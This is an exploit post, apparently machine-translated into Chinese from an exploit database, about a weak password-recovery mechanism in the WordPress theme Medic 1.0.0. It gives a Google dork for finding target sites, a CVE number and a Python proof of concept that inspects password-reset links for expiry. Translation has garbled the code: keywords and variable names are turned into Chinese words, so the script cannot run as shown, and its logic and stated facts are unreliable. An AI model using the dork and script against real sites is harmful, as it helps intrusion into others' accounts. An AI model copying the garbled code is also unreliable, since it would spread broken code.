WordPress主题Medic V1.0.0-弱密码恢复机制被遗忘的密码

[HackApt-37 Team已验证会员]

＃利用标题: WordPress主题Medic V1.0.0-弱密码恢复机制被遗忘的密码
＃dork: inurl:/wp-includes/class-wp-query.php
＃日期: 2023-06-19
＃利用作者: Amirhossein Bahramizadeh
＃类别: WebApps
＃供应商homepage3360 https://www.templatemonster.com/wor...-clinic-wordpress-wordpress-theme-216233.html
＃版本: 1.0.0（必需）
＃在: Windows/Linux上测试
＃CVE: CVE-2020-11027
导入请求
来自BS4进口美丽的小组
从DateTime Import DateTime，TimeDelta
＃设置WordPress网站URL和用户电子邮件地址
site_url='https://example.com'
user_email='[email protected]'
＃从用户电子邮件中获取密码重置链接
＃您可以使用任何电子邮件客户端或库来检索电子邮件
＃在此示例中，我们假设该电子邮件存储在名为'password_reset_email.html'的文件中
使用open（'password_reset_email.html'，'r'）为f:
电子邮件=f.Read（）
汤=beautifutsoup（电子邮件，'html.parser'）
reset_link=soup.find（'a'，href=true）['href']
打印（f'Reset link: {reset_link}'）
＃检查密码重置链接是否在更改用户密码后是否过期
响应=requests.get（reset_link）
if antsphy.status_code==200:
＃从重置链接HTML获取到期日期
汤=beautifutsoup（响应。文本，'html.parser'）
expiration_date_str=soup.find（'p'，string=lambda s:'密码重置链接将在s）.text.split（'on'）[1]
expiration_date=dateTime.strptime（Expiration_date_str，'％b％d，％y％i:％m％p'）
打印（f'Expiration Date: {expiration_date}'）
＃检查到期日期从现在起少于24小时
如果Expiration_date dateTime.now（） + timedelta（小时=24）:
打印（“密码重置链接更改用户密码后将到期。”）
其他:
打印（“密码重置链接更改用户密码时不会过期。”）
其他:
print（f'Error获取reset link: {response.status_code} {response.text}'）
出口（）

 

H

PYLOAD 0.5.0-预授权远程代码执行（RCE）

H

Symantec Siteminder Webagent V12.52-跨站点脚本（XSS）